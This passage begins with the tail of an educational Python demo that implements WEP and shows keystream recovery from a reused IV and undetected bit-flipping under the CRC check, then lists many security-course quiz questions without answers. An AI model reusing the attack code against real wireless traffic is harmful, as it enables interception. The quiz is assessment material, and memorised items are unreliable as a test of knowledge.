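    return plaintext, hmac.compare_digest(mic, expected)

# constructed demo values: 40-bit WEP secret, one reused IV, two 16-byte frames
SECRET = bytes.fromhex("0badc0ffee")
IV = bytes([0x01, 0x02, 0x03])
P1 = b"GET /index.html "
P2 = b"PASS hunter2!!!!"

def demo():
    f1, f2 = wep_encrypt(SECRET, IV, P1), wep_encrypt(SECRET, IV, P2)
    leaked = recover_from_iv_reuse(f1, f2, P1)                     # equals P2
    delta = xor(P1, b"GET /admin.html ")                           # turns index into admin
    tampered_plain, icv_ok = wep_decrypt(SECRET, bit_flip(f1, delta))
    mic_key = b"\x42" * 16
    m1 = mic_encrypt(SECRET, mic_key, IV, P1)
    m_tampered = m1[:3] + xor(m1[3:3 + len(delta)], delta) + m1[3 + len(delta):]
    _, mic_ok = mic_decrypt(SECRET, mic_key, m_tampered)
    return {"leaked": leaked, "tampered_plain": tampered_plain,
            "crc_accepts_tamper": icv_ok, "mic_accepts_tamper": mic_ok}

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

A 24-bit IV gives only about 16.7 million values, so on a busy access point a repeat is a matter of hours, and a 128-bit WEP key does not change that because the IV length is the same. The CRC weakness is independent of key length too: it is a property of the check, not of RC4, which is why WPA added a keyed MIC and a per-packet key mixing rather than just a longer key.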

Chapter 7

1. A user entering her username would correspond to the _____ action in access control.

A. identification
B. authentication
C. authorization
D. access

2. Access control can be accomplished by each of the following except ______.

A. resource management
B. hardware
C. software
D. policy

3. A process functioning on behalf of the user that attempts to access a file is known as a(n) _______.

A. object
B. subject
C. resource
D. operation check

4. The individual who periodically reviews security settings and maintains records of access by users is called the _____.

A. owner
B. custodian
C. manager
D. supervisor

5. In the _____ model, the end user cannot change any security settings.

A. Discretionary Access Control
B. Mandatory Access Control
C. Security Access Control
D. Restricted Access Control

6. Rule Based Access Control _____.

A. dynamically assigns roles to subjects based on rules
B. is considered a real-world approach by linking a user’s job function with security
C. requires that a custodian set all rules
D. is considered obsolete today

7. Separation of duties requires that _____.

A. end users cannot set security for themselves
B. managers must monitor owners for security purposes
C. processes should be divided between two or more individuals
D. jobs be rotated among different individuals

8. _____ in access control means that if a condition is not explicitly met then it is to be rejected.

A. Implicit deny
B. Explicit rejection
C. Denial of duties
D. Prevention control

9. A(n) _____ is a set of permissions that is attached to an object.

A. Subject Access Entity (SAE)
B. object modifier
C. access control list (ACL)
D. security entry designator

10. _____ is a Microsoft Windows feature that provides centralized management and configuration of computers and remote users who are using Active Directory.

A. Windows Register Settings
B. Resource Allocation Entities
C. AD Management Services (ADMS)
D. Group Policy

11. Which of the following is NOT a characteristic of a brute force attack?

A. They are faster than dictionary attacks.
B. They are generally not feasible.
C. They can take a long time to be successful.
D. Each attempt must be entered into the login program to determine if it is correct.

12. _____ create a large pre-generated data set of hashes from nearly every possible password combination.

A. LM hashes
B. NTLM databases
C. Dictionary tables
D. Rainbow tables

13. Which of the following is NOT a password policy defense against an attacker stealing a Windows password file?

A. Password-protect the ROM BIOS.
B. Physically lock the computer case so that it cannot be opened.
C. Disable all necessary accounts.
D. Ensure that all servers and computers are regularly patched.

14. The Domain password policy _____ determines the number of unique new passwords a user must use before an old password can be reused.

A. Maximum password time
B. Minimum password expiration
C. Set password reuse
D. Enforce password history

15. A(n) _____ extends a solid metal bar into the door frame for extra security.

A. preset lock
B. key-in-knob lock
C. tab lock
D. deadbolt lock

16. A(n) _____ uses buttons that must be pushed in the proper sequence to open the door.

A. keyboard lock
B. user bolt lock (UBL)
C. pad lock
D. cipher lock

17. An ID badge fitted with _____ makes it unnecessary to swipe or scan the badge for entry.

A. radio frequency (RFID) tags
B. electromagnetic sentry buttons
C. cipher scans
D. passive cores

18. Using video cameras to transmit a signal to a specific and limited set of receivers is called _____.

A. security monitoring transmission (SMT)
B. vector security (VS)
C. closed circuit television (CCTV)
D. restricted access television

19. The least restrictive access control model is _____.

A. Mandatory Access Control (MAC)
B. Discretionary Access Control (DAC)
C. Role Based Access Control (RBAC)
D. Rule Based Access Control (RBAC)

20. The principle known as _____ in access control means that each user should only be given the minimal amount of privileges necessary for that person to perform their job function.

A. least privilege
B. deny all
C. Enterprise Security
D. Mandatory Limitations

Chapter 8

1. Determining what a user did on a system is called _____.

A. identification
B. authentication
C. authorization
D. accounting

2. Which of the following is NOT an authentication method?

A. what a user knows
B. what a user has
C. what a user discovers
D. what a user is

3. One-time passwords that utilize a token with an algorithm and a synchronized time setting are known as a(n) __________.

A. time-signature OTP
B. challenge-based OTP
C. time-synchronized OTP
D. token OTP

4. Which of the following is a difference between a time-synchronized OTP and a challenge-based OTP?

A. Only time-synchronized OTPs use tokens.
B. The user must enter the challenge into the token with a challenge-based OTP.
C. Challenge-based OTPs use authentication servers while time-synchronized OTPs do not.
D. Time-synchronized OTPs cannot be used with Web accounts while challenge-based OTPs can.

5. Keystroke dynamics is an example of what type of biometrics?

A. behavioral biometrics
B. cognitive biometrics
C. adaptive biometrics
D. resource biometrics

6. Creating a pattern of when and from where a user accesses a remote Web account is an example of ________.

A. computer footprinting
B. Time-Location Resource Monitoring (TLRM)
C. cognitive biometrics
D. keystroke dynamics

7. _____ is a decentralized open source FIM that does not require specific software to be installed on the desktop.

A. Windows CardSpace
B. OpenID
C. Windows Live ID
D. .NET Login

8. A RADIUS authentication server requires that the _____ must be authenticated first.

A. supplicant
B. authenticator
C. authentication server
D. user

9. Each of the following makes up the AAA elements in network security except _______.

A. determining user need (analyzing)
B. controlling access to network resources (authentication)
C. enforcing security policies (authorization)
D. auditing usage (accounting)

10. Each of the following human characteristics can be used for biometric identification except _______.

A. weight
B. fingerprint
C. retina
D. face

11. _____ biometrics is related to the perception, thought processes, and understanding of the user.

A. Behavioral
B. Standard
C. Cognitive
D. Intelligence

12. Using one authentication to access multiple accounts or applications is known as _______.

A. credentialization
B. identification authentication
C. federal login
D. single sign-on

13. With the development of IEEE 802.1x port security, the authentication server _____ has seen even greater usage.

A. DAP
B. RADIUS
C. AAA
D. RDAP

14. A(n) _____ makes a request to join the network.

A. authenticator
B. Resource Allocation Entity (RAE)
C. applicant
D. supplicant

15. _____ is an authentication protocol available as a free download and runs on Microsoft Windows Vista, Windows Server 2008, Apple Mac OS X, and Linux.

A. IEEE 802.1x
B. RADIUS
C. Kerberos
D. LDAP

16. The version of the X.500 standard that runs on a personal computer over TCP/IP is _____.

A. DAP
B. LDAP
C. IEEE X.501
D. Lite RDAP

17. The management protocol of IEEE 802.1x that governs the interaction between the system, authenticator, and RADIUS server is known as _____.

A. RADIUS Server Protocol
B. Authentication Protocol
C. Transmission Control Protocol (TCP)
D. Extensible Authentication Protocol (EAP)

18. Which of the following protocols is the strongest?

A. EAP with Transport Layer Security (EAP-TLS)
B. Password Authentication Protocol (PAP)
C. Challenge-Handshake Authentication Protocol (CHAP)
D. Microsoft Challenge-Handshake Authentication Protocol (MS-CHAP)

19. A user-to-LAN virtual private network connection used by remote users is called a(n) _____.

A. site-to-site VPN
B. remote-access VPN
C. endpoint VPN
D. concentration VPN

20. Endpoints that provide _____ capability require that a separate VPN client application be installed on each device that connects to a VPN server.

A. built-in VPN
B. transparent endpoint VPN
C. pass-through VPN
D. concentration VPN

Chapter 11

1. The areas of a file in which steganography can hide data include all of the following except __________.

A. in data that is used to describe the content or structure of the actual data
B. in the file header fields that describe the file
C. in areas that contain the content data itself
D. in the directory structure of the file system

2. Data that is to be encrypted by inputting into an algorithm is called __________.

A. clear text
B. open text
C. ciphertext
D. plaintext

3. Each of the following is a basic security protection over information that cryptography can provide except __________.

A. confidentiality
B. stop loss
C. integrity
D. authenticity

4. Proving that a user sent an e-mail message is known as __________.

A. non-repudiation
B. reverse confidentiality
C. integrity
D. availability

5. A(n) __________ is never intended to be decrypted but is only used for comparison purposes.

a. plaintext
b. algorithm
c. key
d. digest

6. Each of the following is an example of how hashing is used except __________.

a. bank automatic teller machine (ATM)
b. verifying a user password entered on a Linux system
c. determining the integrity of a message
d. encrypting and decrypting e-mail attachments

7. Which of the following is NOT a characteristic of a secure hash algorithm?
a. The results of a hash function should not be reversed.
b. The hash should always be the same fixed size.
c. A message cannot be produced from a predefined hash.
d. Collisions should be rare.

8. The data added to a section of text when using the Message Digest (MD) algorithm is called __________.
a. filler
b. extender
c. padding
d. byte extensions

9. Which of the following is a protection provided by hashing?
a. confidentiality
b. integrity
c. availability
d. authenticity

10. Symmetric cryptographic algorithms are also called __________.
a. cipherkey cryptography
b. public/private key cryptography
c. public key cryptography
d. private key cryptography

11. Monoalphabetic substitution ciphers and homoalphabetic substitution ciphers are examples of __________.
a. symmetric stream ciphers
b. generic block ciphers
c. asymmetric block ciphers
d. hash ciphers

12. Which of the following is the strongest symmetric cryptographic algorithm?
a. Data Encryption Standard
b. Triple Data Encryption Standard
c. Advanced Encryption Standard
d. Rivest Cipher (RC) 1

13. When Bob wants to send a secure message to Alice using an asymmetric cryptographic algorithm, which key does he use to encrypt the message?
a. Bob’s public key
b. Alice’s public key
c. Bob’s private key
d. Alice’s private key

14. A digital signature can provide each of the following benefits except __________.
a. verify the receiver
b. verify the sender
c. enforce non-repudiation
d. prove the integrity of the message

15. Which of the following asymmetric cryptographic algorithms is the most secure?
a. RSA
b. MD-17
c. SHA-2
d. ERFGA

16. __________ uses the Windows NTFS file system to automatically encrypt all files.
a. Encrypting File System (EFS)
b. GNU PGP
c. IDEA
d. MD-1

17. The Microsoft Windows BitLocker whole disk encryption cryptography technology can protect each of the following except __________.
a. Windows system files
b. user files
c. temporary files
d. domain name system files

18. The Trusted Platform Module (TPM) __________.
a. is only available on Windows computers running BitLocker
b. includes a pseudorandom number generator (PRNG)
c. provides cryptographic services in hardware instead of software
d. allows the user to boot a corrupted disk and repair it

19. Most security experts recommend that __________ be replaced with a more secure algorithm.
a. DES
b. RSA
c. AES-256
d. MD-17

20. The Microsoft Windows LAN Manager hash __________.
a. is part of BitLocker
b. is required to be present when using TPM
c. is weaker than NTLMv2
d. is the same as MD-5

Chapter 12

1. The strongest technology that would assure Alice that Bob is the sender of a message is a(n) __________.
a. digital signature
b. digital certificate
c. hash
d. encrypted signature

2. A digital certificate associates __________.
a. the user’s identity with their public key
b. a user’s private key with the public key
c. a digital signature with a user
d. a private key with a digital signature

3. An entity that issues digital certificates for others is a __________.
a. Certificate Authority (CA)
b. Signature Authority (SA)
c. Digital Signer (DS)
d. Certificate Signatory (CS)

4. A list of approved digital certificates is called a(n) __________.
a. Digital Certificate Authorization Form (DCAF)
b. Certificate Repository (CR)
c. Authorized Digital Signature
d. Digital Signature Permitted Authorization (DSPA)

5. Digital certificates can be used for each of the following except __________.
a. Verify the identity of clients and servers on the Web
b. Encrypt messages for secure e-mail communications
c. Verify the authenticity of the Registration Authorizer
d. Encrypt channels to provide secure communication between clients and servers

6. In order to ensure a secure cryptographic connection between a Web browser and a Web server, a __________ digital certificate would be used.
a. personal digital certificate
b. Web digital certificate
c. personal Web certificate determining the integrity of a message
d. server digital certificate

7. A digital certificate that turns the address bar green is a(n) __________.
a. Extended Validation SSL Certificate
b. Web Server Advanced Certificate
c. Personal Web-Client Certificate
d. Internet Standard Certificate

8. Digital certificates that are split into two parts are known as __________ certificates.
a. binary
b. extended
c. dual-sided
d. split

9. Which of the following is NOT a field of an X.509 certificate?
a. validity period
b. serial number
c. signature
d. CA expiration code

10. Public key infrastructure (PKI) __________.
a. protects cipherkey cryptography
b. generates public/private keys automatically
c. is the management of digital certificates
d. creates private key cryptography

11. Public-Key Cryptography Standards (PKCS) __________.
a. have been replaced by PKI
b. are widely accepted in the industry
c. define how hashing algorithms are created
d. are used to create public keys only

12. The __________ trust model supports CA.
a. direct
b. indirect
c. third party
d. remote

13. Hierarchical trust models are best suited for __________.
a. Internet usage
b. single organizations
c. settings with multiple CAs and RAs
d. organizations with fewer than 10 users

14. A(n) __________ is a published set of rules that govern the operation of a PKI.
a. Certificate Practice Statement (CPS)
b. Signature Resource Guide (SRG)
c. Enforcement Certificate
d. certificate policy (CP)

15. Each of the following is a part of the certificate life cycle except __________.
a. Creation
b. Revocation
c. Authorization
d. Expiration

16. Keys can be stored in each of the following except __________.
a. embedded in digital certificates
b. stored on the user’s local system
c. in tokens
d. in hashes

17. __________ refers to a situation in which keys are managed by a third party, such as a trusted CA.
a. Key escrow
b. Trusted key authority
c. Key authorization
d. Remote key administration

18. A cryptographic transport protocol for FTP is __________.
a. RAS-256
b. MIME
c. UNIX Remote Shell Encryption (UNIX-RSE)
d. Secure Sockets Layer (SSL)

19. What is the cryptographic transport protocol that is used most often to secure Web transactions?
a. HTTPS
b. SHTTP
c. PPPTPoE
d. MD-17

20. Which is the most secure VPN cryptographic transport protocol?
a. LPTP2
b. PTP
c. IPsec
d. Hash-32


Security Guide to Network Security Fundamentals

Chapter 1 Additional 20 questions

1. While most attacks take advantage of vulnerabilities that someone has already uncovered, a(n) ____ occurs when an attacker discovers and exploits a previously unknown flaw.
a. a zero day
b. identity theft
c. phishing
d. scam

2. In a ____ attack, attackers use hundreds or thousands of computers in an attack against a single computer or network.

a. centered
b. local
c. remote
d. distributed

3. _____ ensures that only authorized parties can view information.

a. Security
b. Availability
c. Integrity
d. Confidentiality

4. _____ ensures that information is correct and that no unauthorized person or malicious software has altered that data.

a. Availability
b. Confidentiality
c. Integrity
d. Identity

5. In information security, a loss can be _____.

a. theft of information
b. a delay in transmitting information that results in a financial penalty
c. the loss of good will or a reputation
d. all of the above

6. In information security, a threat agent can be defined as _____.

a. a force of nature such as a tornado that could destroy computer equipment
b. a virus that attacks a computer network
c. an unsecured computer network
d. both a and b

7. Business ____ theft involves stealing proprietary business information such as research for a new drug or a list of customers that competitors are eager to acquire.

a. identity
b. data
c. plan
d. record

8. According to the 2007 FBI Computer Crime and Security Survey, the loss due to the theft of confidential data for 494 respondents was approximately ____.

a. $1 million
b. $10 million
c. $50 million
d. $100 million

9. ____ involves using someone’s personal information, such as social security numbers, to establish bank or credit card accounts that are then left unpaid, leaving the victim with the debts and ruining their credit rating.

a. Cyber terrorism
b. Identity theft
c. Phishing
d. Scam

10. Under the _____, healthcare enterprises must guard protected health information and implement policies and procedures to safeguard it, whether it be in paper or electronic format.

a. HIPAA
b. HLPDA
c. HCPA
d. USHIPA

11. What is the maximum fine for those who wrongfully disclose individually identifiable health information with the intent to sell it?

a. $100,000
b. $250,000
c. $500,000
d. $1,000,000

12. The _____ act is designed to broaden the surveillance of law enforcement agencies so they can detect and suppress terrorism.

a. Gramm-Leach-Bliley
b. Sarbanes-Oxley
c. California Database Security Breach
d. USA Patriot

13. COPPA requires operators of online services or Web sites designed for children under the age of _____ to obtain parental consent prior to the collection, use, disclosure, or display of a child’s personal information.

a. 8
b. 10
c. 13
d. 16

14. In a company of 500 employees, it is estimated that _____ employees would be required to combat a virus attack.

a. two
b. five
c. seven
d. ten

15. The single most expensive malicious attack was the 2000 ____, which cost an estimated $8.7 billion.

a. Nimda
b. Slammer
c. Love Bug
d. Code Red

16. What is another name for unsolicited e-mail messages?

a. spam
b. spawn
c. trash
d. scam

17. According to the research group Postini, over ____ of daily e-mail messages are unsolicited and could be carrying a malicious payload.

a. one-third
b. two-thirds
c. three-fourths
d. four-fifths

18. ____ are a loose-knit network of attackers, identity thieves, and financial fraudsters.

a. Cyber criminals
b. Cyber terrorists
c. Computer spies
d. Hackers

19. Targeted attacks against financial networks, unauthorized access to information, and the theft of personal information is sometimes known as ____.

a. spam
b. phishing
c. cyber crime
d. cyber terrorism

20. A security ____ focuses on the administration and management of plans, policies, and people.

a. manager
b. engineer
c. auditor
d. inspector


Chapter 2 Additional 20 questions

1. Flash memory is a type of ____, nonvolatile computer memory that can be electrically erased and rewritten repeatedly.

a. EROM
b. ROM
c. EEPROM
d. RAM

2. ____ involves horizontally separating words, although it is still readable by the human eye.

a. Word splitting
b. GIF layering
c. Geometric variance
d. Layer variance

3. ____ is an image spam that is divided into multiple images.

a. Word splitting
b. Geometric variance
c. Layer variance
d. GIF layering

4. A ____ is a computer program or a part of a program that lies dormant until it is triggered by a specific logical event.

a. Trojan
b. logic bomb
c. macro virus
d. metamorphic virus

5. ____ is a software program that delivers advertising content in a manner that is unexpected and unwanted by the user.

a. Adware
b. Keylogger
c. Spam
d. Trojan

6. One type of virtualization in which an entire operating system environment is simulated is known as ____ virtualization.

a. NOS
b. guest
c. operating system
d. host

7. A ____ virus can interrupt almost any function executed by the computer operating system and alter it for its own malicious purposes.

a. companion
b. file infected
c. resident
d. boot

8. With operating system virtualization, a virtual machine is simulated as a self-contained software environment by the ____ system (the native operating system to the hardware).

a. guest
b. host
c. root
d. server

9. ____ are portable communication devices that function in a manner that is unlike wired telephones.

a. USB devices
b. NAS devices
c. Cell phones
d. SAN

10. Today’s computer systems have a(n) ____ chip in which the contents can be rewritten to provide new functionality.

a. ROM
b. RAM
c. EROM
d. PROM

11. A ____ virus infects the Master Boot Record of a hard disk drive.

a. file infector
b. companion
c. resident
d. boot

12. ____ is a means of managing and presenting computer resources by function without regard to their physical layout or location.

a. Expansion
b. Virtualization
c. Load balancing
d. Distribution

13. ____ technology enables a virtual machine to be moved to a different physical computer with no impact to the users.

a. Live migration
b. Load balancing
c. Operating system virtualization
d. Server virtualization

14. A ____ is a single, dedicated hard disk-based file storage device that provides centralized and consolidated disk storage available to LAN users through a standard network connection.

a. NAS
b. NSA
c. NSF
d. NFS

15. A computer ____ is a program that secretly attaches itself to a legitimate “carrier,” such as a document or program, and then executes when that document is opened or program is launched.

a. virus
b. worm
c. adware
d. spyware

16. In order to avoid detection, some viruses can alter how they appear. These are known as ____ viruses.

a. macro
b. metamorphic
c. boot
d. companion

17. A ____ is a program advertised as performing one activity but actually does something else.

a. script
b. virus
c. Trojan
d. worm

18. The ____ is the link between the cellular network and the wired telephone world and controls all transmitters and base stations in the cellular network.

a. SAN
b. NAS
c. RF cell
d. MTSO

19. ____ uses “speckling” and different colors so that no two spam e-mails appear to be the same.

a. GIF layering
b. Geometric variance
c. Word splitting
d. Layer variance

20. Creating and managing multiple server operating systems is known as ____ virtualization.

a. operating system
b. host
c. guest
d. server

Chapter 3 Additional 20 questions

1. A(n) ____ is a small Web browser window that appears over the Web site that is being viewed.

a. swarm
b. torrent
c. popup
d. applet

2. ____, also called add-ons, represent a specific way of implementing ActiveX and are sometimes called ActiveX applications.

a. Applets
b. ActiveX controls
c. Scripts
d. Beans

3. ____ hinges on an attacker being able to enter an SQL database query into a dynamic Web page.

a. XSS
b. SQL injection
c. Script injection
d. Sandboxing

4. BitTorrent maximizes the transfer speed by gathering pieces of the file and downloading these pieces simultaneously from users who already have them (the collective pieces are called a ____).

a. leech
b. swarm
c. seed
d. track

5. ____ is a Windows Vista and Windows XP Service Pack 2 (SP2) feature that prevents attackers from using buffer overflow to execute malware.

a. DEP
b. NX
c. ASLR
d. ASDEP

6. ____ is a process of ensuring that any inputs are “clean” and will not corrupt the system.

a. Cross-site scripting
b. SQL injection
c. Script injection
d. Input validation

7. ____ is real-time communication between two or more users.

a. SMTP
b. SMTP open relay
c. ActiveX
d. Instant messaging (IM)

8. SMTP servers can forward e-mail sent from an e-mail client to a remote domain. This is known as ____.

a. SMTP relay
b. IMAP
c. Spam
d. Spam relay

9. Instead of the Web server asking the user for the same information each time she visits that site, the server can store that user-specific information in a file on the user’s local computer and then retrieve it later. This file is called a(n) ____.

a. cookie
b. bug
c. ActiveX control
d. script

10. In a P2P network, a ____ is a server program operated by the person or organization that wants to share the file.

a. torrent
b. seed
c. leecher
d. tracker

11. The goal of ____ is to make it harder to predict where the operating system functionality resides in memory.

a. DEP
b. ASLR
c. NX
d. ASNX

12. A(n) ____ is a computer programming language that is typically interpreted into a language the computer can understand.

a. ActiveX control
b. cookie
c. shell
d. scripting language

13. Regarding e-mail, ____ handles outgoing mail.

a. SMTP
b. POP3
c. IMAP
d. SNMP

14. A ____ is a cumulative package of all security updates plus additional features.

a. service patch
b. hotfix
c. service pack
d. security patch

15. Regarding e-mail, ____ is responsible for incoming mail.

a. SMTP
b. IMAP
c. POP3
d. SNMP

16. If SMTP relay is not controlled, an attacker can use it to forward thousands of spam e-mail messages. An uncontrolled SMTP relay is known as a(n) ____.

a. IMAP open relay
b. SMTP open relay
c. open POP
d. open IMAP

17. The ____ are the operating system settings that impose how the policy will be enforced.

a. security policies
b. group policies
c. security templates
d. configuration baselines

18. ____ typically involves using client-side scripts written in JavaScript that are designed to extract information from the victim and then pass the information to the attacker.

a. Spam
b. SQL injection
c. Cross site scripting (XSS)
d. SQL scripting

19. ____ are active Internet connections that download a specific file that is available through a tracker.

a. Torrents
b. Applets
c. ActiveX controls
d. Scripts

20. ____ is a language used to view and manipulate data that is stored in a relational database.

a. CSS
b. XSS
c. SQL
d. DEP

Chapter 4 Additional 20 questions

1. Wireless location mapping is the formal expression for ____.

a. wireless scanning
b. wireless caching
c. war driving
d. wireless beaconing

2. The most common type of antenna for war driving is an omnidirectional antenna, also known as a ____ antenna.

a. bipole
b. dipole
c. GPS
d. tagging

3. Each wireless device looks for beacon frames in a process known as ____.

a. mapping
b. scanning
c. caching
d. beaconing

4. One approach to substituting a fraudulent IP address is to target the external DNS server and is called ____.

a. DNS spoofing
b. DNS transfer
c. zone transfer
d. DNS poisoning

5. In order for a host using TCP/IP on an Ethernet network to find the MAC address of another device, it uses ____.
a. BIND
b. MAC-DNS
c. ARP
d. DNS

6. ____ enables the attacker’s computer to forward any network traffic it receives from Computer A to the actual router.
a. IP mirroring
b. Port mirroring
c. IP forwarding
d. Port forwarding

7. When TCP/IP was developed, the host table concept was expanded to a hierarchical name system known as the ____.
a. ARPAnet
b. DNS
c. SNMP
d. SMTP

8. A group of piconets in which connections exist between different piconets is called a ____.
a. shortnet
b. meshnet
c. multinet
d. scatternet

9. With wireless CSMA/CA, the amount of time that a device must wait after the medium is clear is called the ____.
a. collision time
b. slot time
c. clear time
d. tx time

10. ____ is the name given to a wireless technology that uses short-range RF transmissions.
a. Bluetooth
b. Piconet
c. Scatternet
d. Wi-fi

11. A(n) ____ is an account that is secretly set up without the administrator’s knowledge or permission, that cannot be easily detected, and that allows for remote access to the device.
a. escalation account
b. weak password
c. back door
d. default account

12. ____ allows the administrator to configure a switch to redirect traffic that occurs on some or all ports to a designated monitoring port on the switch.

a. Sniffering
b. Protocol analyzer
c. NIC mirroring
d. Port mirroring

13. DNS poisoning can be prevented by using the latest editions of the DNS software, ____.
a. BIND
b. DNSS
c. IPsec
d. BINDSEC

14. The most common protocol suite used today for networks as well as the Internet is ____.
a. TCP/IP
b. SMTP
c. SNMP
d. DNS

15. ____ specifies that before a networked device starts to send, it should first listen (called carrier sensing) to see if any other device is transmitting.
a. CSMA/ACK
b. CSMA/CA
c. CSMA/CD
d. CSCD/MA

16. ____ is a popular protocol used to manage network equipment.
a. SMTP
b. IMAP
c. TCP/IP
d. SNMP

17. A(n) ____ attack makes a copy of the transmission before sending it to the recipient.
a. man-in-the-middle
b. replay
c. DNS spoofing
d. ARP poisoning

18. In a “____ attack,” a TCP/IP ping request is sent to all computers on the network, which makes it appear that a server is asking for a response.
a. smurf
b. ping of death
c. frame
d. DNS poisoning

19. An attacker could alter the MAC address in the ARP cache so that the corresponding IP address would point to a different computer, which is known as ____.
a. DNS spoofing
b. DNS poisoning
c. ARP transfer
d. ARP poisoning

20. At regular intervals a wireless AP sends a beacon frame to announce its presence and to provide the necessary information for devices that want to join the network. This process is known as ____.
a. beaconing
b. scanning
c. mapping
d. caching

Chapter 5 Additional 20 questions

1. The goal of ____ is to prevent computers with sub-optimal security from potentially infecting other computers through the network.

a. subnetting
b. NAT
c. NAC
d. PAT

2. ____ honeypots are used mainly by organizations to capture limited information regarding attacks on that organization’s honeypot.

a. Research
b. Production
c. Clustered
d. Virtual

3. ____ are designed to inspect traffic, and based on their configuration or security policy, they can drop malicious traffic.

a. NIDS
b. HIPS
c. NIPS
d. HIDS

4. ____ switches are connected directly to the devices on the network.
a. Workgroup
b. Core
c. Stateless
d. Stateful

5. ____ packet filtering keeps a record of the state of a connection between an internal computer and an external server and then makes decisions based on the connection as well as the rule base.

a. Stateless
b. Stateful
c. Classful
d. Classless

6. A ____ watches for attempts to penetrate a network.

a. SIDS
b. HIDS
c. NIDS
d. PIDS

7. A ____ is an instruction that interrupts the program being executed and requests a service from the operating system.

a. system call
b. system command
c. kernel call
d. system module

8. ____ can fully decode application-layer network protocols. Once these protocols are decoded, the different parts of the protocol can be analyzed for any suspicious behavior.

a. Proxy servers
b. Protocol analyzers
c. Firewalls
d. HIDS

9. ____ work to protect the entire network and all devices that are connected to it.

a. HIPS
b. HIDS
c. Reverse proxy
d. NIPS

10. A software-based ____ attempts to monitor and possibly prevent attempts to attack a local system.

a. HIDS
b. NIDS
c. SIDS
d. PIDS

11. ____ examines the current state of a system or network device before it is allowed to connect to the network.

a. NAT
b. PAT
c. VAC
d. NAC

12. The goal of a ____ is to hide the IP address of client systems inside the secure network.

a. VLAN
b. switch
c. router
d. proxy server

13. ____ honeypots are used mainly by organizations to capture limited information regarding attacks on that organization’s honeypot.

a. Virtual
b. Research
c. Production
d. Clustered

14. A(n) ____ attempts to identify inappropriate activity.

a. reverse proxy
b. IDS
c. firewall
d. proxy server

15. ____ IP addresses are not assigned to any specific user or organization; instead, they can be used by any user on the private internal network.

a. Public
b. Virtual
c. DMZ
d. Private

16. A variation of NAT is ____. Instead of giving each outgoing packet a different IP address, each packet is given the same IP address but a different TCP port number.

a. PAT
b. CAT
c. DAT
d. TAT

17. A(n) ____ finds malicious traffic and deals with it immediately.

a. IDS
b. HIDS
c. NIDS
d. IPS

18. Using ____, networks can essentially be divided into three parts: network, subnet, and host.

a. classful addressing
b. subnetting
c. stateful addressing
d. stateless addressing

19. A ____ is a computer typically located in a DMZ that is loaded with software and data files that appear to be authentic, yet they are actually imitations of real data files.

a. proxy server
b. honeypot
c. reverse proxy
d. HIDS

20. ____ are subdivisions of IP address class (Class A, B, or C) networks and allow a single Class A, B, or C network to be used instead of multiple networks.

a. Workgroup
b. VLANs
c. Subnets
d. Domains


Chapter 6 Additional 20 questions

1. IEEE 802.11i authentication and key management is accomplished by the IEEE ____ standard.
a. 802.11a
b. 802.11n
c. 802.1x
d. 802.3i

2. This IEEE ____ standard specifies a maximum rated speed of 54 Mbps using the 5 GHz spectrum.

a. 802.11a
b. 802.11b
c. 802.11c
d. 802.11d

3. At regular intervals a wireless AP sends a beacon frame to announce its presence and to provide the necessary information for devices that want to join the network. This process is known as ____.

a. broadcasting
b. beaconing
c. roaming
d. association
4. In 2002, the WECA organization changed its name to ____.

a. Wi-Fi Alliance
b. WECA Alliance
c. WTiG
d. iWITG

5. With ____ scanning, a wireless device simply listens for a beacon frame for a set period of time.

a. active
b. broadcast
c. reactive
d. passive

6. Access points have a setting called “____,” which is what the PSK uses as a seed value to generate new keys.

a. Group Key Renewal
b. Interseed
c. PSK-seed
d. PSK-IV

7. WPA also replaces the cyclic redundancy check (CRC) function in WEP with the ____.

a. TKIP
b. MIC
c. PSK
d. MD5

8. Encryption under the WPA2 personal security model is accomplished by ____.

a. DES-CCMP
b. AES-CCMP
c. 3DES
d. RC5

9. ____ was designed to ensure that only authorized parties can view transmitted wireless information.

a. WECA
b. MAC
c. WEP
d. 802.11g

10. ____ authentication is based upon the fact that only pre-approved wireless devices are given the shared key.

a. Open key
b. Open system
c. Shared system
d. Shared key

11. WPA replaces WEP with an encryption technology called ____.

a. GKR
b. PSK
c. TKIP
d. RC5

12. A(n) ____ frame carries information about the data rates that the device can support along with the Service Set Identifier (SSID) of the network it wants to join.

a. open authentication
b. device request
c. association request
d. roaming

13. The plaintext to be transmitted has a cyclic redundancy check (CRC) value calculated, which is a checksum based on the contents of the text. WEP calls this the ____ and appends it to the end of the text.

a. integrity check value (ICV)
b. keystream
c. initialization vector (IV)
d. prepended IV

14. In the early 1980s, the IEEE began work on developing computer network architecture standards. This work was called ____, and it quickly expanded into several different categories of network technology.

a. Project 100
b. Project 302
c. Project 513
d. Project 802

15. In order to address growing wireless security concerns, in October 2003 the Wi-Fi Alliance introduced ____.

a. RC5
b. WEP2
c. AES
d. WPA

16. ____ is intended for personal and small office home office users who do not have advanced server capabilities.

a. PSK
b. AES
c. CCMP
d. CBC-MAC

17. The PRNG in WEP is based on the ____ cipher algorithm.

a. RC2
b. RC4
c. DES
d. AES

18. IEEE 802.11i includes ____, which stores information from a device on the network so if a user roams away from a wireless access point and later returns, he does not need to re-enter all of the credentials.

a. pre-authentication
b. AES-CCMP
c. PSK
d. key-caching

19. WEP accomplishes confidentiality by taking unencrypted text and then encrypting or “scrambling” it into ____ so that it cannot be viewed by unauthorized parties while being transmitted.

a. plaintext
b. ciphertext
c. simpletext
d. shuffletext

20. Mobile devices constantly survey the radio frequencies at regular intervals to determine if a different AP can provide better service. If it finds one, then the device automatically attempts to associate with the new AP (this process is called ____).

a. beaconing
b. a turnoff
c. a handoff
d. scanning

Chapter 7 Additional 20 questions
To be continued... (I'm busy recently; it's all in hard copy and I need time to key it in)

NETWORK VULNERABILITY & SECURITY TOOLS (ET0521)

59-question quiz for MST, Chapter 1 to Chapter 6

1. Which of the following is the best method for preventing social engineering attacks?
a) User Education
b) Security Tokens
c) Biometric devices
d) Encryption



2. When a browser is trying to contact a web server, the client OS dynamically assigns a source port value of _____.
a) less than 1024
b) greater than 80
c) greater than 1023
d) greater than 1024


3. The following are commonly used techniques for reconnaissance except ______.
a) low-technology reconnaissance
b) web searches
c) whois database analysis
d) High performance hardware


4. An attacker with a low skill level is called a ______.
a) cracker
b) hacker
c) script kiddie
d) Phreaker

5. _____ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet Sniffing
b) Packet Spoofing
c) Packet Stealing
d) Packet Engineering

6. Which of the following software is a good port scanning tool?
a) Telnet
